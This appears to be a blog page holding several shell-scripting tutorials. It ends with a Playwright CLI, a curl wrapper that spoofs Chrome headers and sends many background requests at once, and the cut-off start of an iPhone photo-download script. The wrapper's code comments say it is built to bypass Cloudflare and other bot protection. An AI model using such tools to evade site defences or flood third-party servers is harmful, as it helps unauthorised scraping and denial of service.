  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer
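These checks are easy to replicate in wrappers of your own. A standalone sketch of the same rules as a shell function (the function name is illustrative, not part of the CLI):

```shell
# Sketch of the CLI's --count/--async validation rules (names are illustrative)
validate_count() {
  local count="$1" async="$2"
  # Must be a positive integer
  if ! [[ "$count" =~ ^[0-9]+$ ]] || [[ "$count" -lt 1 ]]; then
    echo "Error: --count must be a positive integer" >&2
    return 1
  fi
  # More than one request only makes sense in async mode
  if [[ "$count" -gt 1 && "$async" != "true" ]]; then
    echo "Error: --count requires --async" >&2
    return 1
  fi
}

validate_count 100 true  && echo "100 with --async: ok"
validate_count 5   false || echo "5 without --async: rejected"
validate_count abc true  || echo "non-integer: rejected"
```

Validating the integer first matters: comparing a non-numeric value with `-gt` would itself error out in bash.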

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.
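Because the cookie jar is plain Playwright storageState JSON (`{"cookies":[...],"origins":[...]}`), you can inspect it with standard tools. The file and cookie values below are made up for illustration; point the same one-liner at a jar written by a real `-c` run:

```shell
# Create a tiny example storageState jar (illustrative values only)
cat > pw_session.json << 'EOF'
{"cookies":[{"name":"session","value":"abc123","domain":"httpbin.org","path":"/","secure":true}],"origins":[]}
EOF

# List the cookies it contains
python3 - << 'PY'
import json
for c in json.load(open("pw_session.json")).get("cookies", []):
    print(f'{c["domain"]}: {c["name"]}={c["value"]}')
PY
```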

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

Troubleshooting

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal script with GET, redirect, and cookie support. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        with open(args.cookie, 'w') as f:
            json.dump({'cookies': driver.get_cookies()}, f, indent=2)
    except Exception:
        pass
    if args.output:
        with open(args.output, 'w') as f:
            f.write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count (check it's a valid integer first; comparing a non-numeric
# value with -gt would itself error out)
if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (create the file only if missing, so saved cookies aren't clobbered)
    [[ -f "$COOKIE_FILE" ]] || : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with --count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

Option            Description                                            Default
-X, --method      HTTP method (GET/POST/PUT/DELETE)                      GET
-d, --data        Request body (JSON or form)                            —
-H, --header      Add extra headers (repeatable)                         —
-o, --output      Write response to a file                               stdout
-c, --cookie      Cookie file to use (and persist)                       temp file
-A, --user-agent  Override User-Agent                                    Chrome/macOS
-t, --timeout     Max request time in seconds                            30
--async           Run request(s) in the background                       false
--count N         Fire N async requests (requires --async)               1
--no-redirect     Don’t follow redirects                                 follows
--show-headers    Include response headers                               false
--json            Sets Content-Type: application/json                    —
--form            Sets Content-Type: application/x-www-form-urlencoded   —
-v, --verbose     Verbose diagnostics                                    false
-h, --help        Show usage                                             —

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior

Cookie persistence

  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Cookie file automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.
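To see exactly what the wrapper will run without sending anything, you can rebuild the argument array and print it with `printf %q` — the same array technique the script uses internally. This is a standalone sketch with a trimmed header set, not the script's full configuration:

```shell
# Dry-run preview: print the curl command the wrapper would assemble
preview_curl() {
  local url="$1"
  local -a curl_args=(
    --compressed --http2 --location
    --header "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
    --header "Accept-Language: en-US,en;q=0.9"
    --header "Accept-Encoding: gzip, deflate, br"
  )
  # %q shell-quotes each argument so the output is copy-pasteable
  printf 'curl'
  printf ' %q' "${curl_args[@]}" "$url"
  echo
}

preview_curl https://example.com
```

Building arguments as an array (rather than a string) is what keeps headers with spaces intact; `%q` shows you that quoting explicitly.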

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
cat > test_auth.sh << 'SCRIPT'
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d '{"username":"user","password":"pass"}' "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available from anywhere, install it on your PATH:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Issue: Warning about a missing cookie file

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests
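Step 2 is the only fiddly part: Playwright saves cookies as storageState JSON, while curl reads the Netscape cookie-jar format. A hedged sketch of the conversion — the sample cookie and file names here are made up; point the converter at your real storageState export:

```shell
# Example storageState export (illustrative values only)
cat > pw_state.json << 'EOF'
{"cookies":[{"name":"session","value":"abc123","domain":".example.com","path":"/","expires":1999999999,"secure":true}],"origins":[]}
EOF

# Convert to the Netscape format curl's --cookie option reads:
# domain, include-subdomains flag, path, secure flag, expiry, name, value
python3 - << 'PY' > cookies.txt
import json
print("# Netscape HTTP Cookie File")
for c in json.load(open("pw_state.json"))["cookies"]:
    sub = "TRUE" if c["domain"].startswith(".") else "FALSE"
    sec = "TRUE" if c.get("secure") else "FALSE"
    exp = str(int(c["expires"])) if c.get("expires", -1) > 0 else "0"
    print("\t".join([c["domain"], sub, c.get("path", "/"), sec, exp, c["name"], c["value"]]))
PY

cat cookies.txt
# Step 3 then becomes: ./browser_curl.sh -c cookies.txt https://example.com/dashboard
```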

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

Test                           Time    Requests/sec
Single sync request            ~0.2s   —
10 async requests (--count)    ~0.03s  333/s
100 async requests (--count)   ~0.09s  1111/s
1000 async requests (--count)  ~0.8s   1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

A Script to download Photos, Videos and Images from your iPhone to your MacBook (by creation date and a file name filter)

Annoyingly, Apple never quite got around to making it easy to offload images from your iPhone to your MacBook. Below is a complete guide to automatically download photos and videos from your iPhone to your MacBook, with options to filter by pattern and date and to organize files into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e

echo "Installing tools..."

echo "Installing macFUSE"
brew install --cask macfuse

echo "Adding Brew Tap" 
brew tap gromgit/fuse

echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac

echo "Installing libimobiledevice" 
brew install libimobiledevice

echo "Installing exiftool"
brew install exiftool

echo "Done! Tools installed."
EOF

echo "Making executable..."
chmod +x install_iphone_util.sh

./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash

cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash

# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads

set -e

# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true

# Usage function
usage() {
    cat << INNER_EOF
Usage: $0 [OPTIONS]

Download photos and videos from iPhone to MacBook.

OPTIONS:
    -p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
                        Default: * (all files)
    -o OUTPUT_DIR       Output directory (default: current directory)
    -d                  Organize files by creation date into YYYY/MMM folders
    -s START_DATE       Start date filter (YYYY-MM-DD)
    -e END_DATE         End date filter (YYYY-MM-DD)
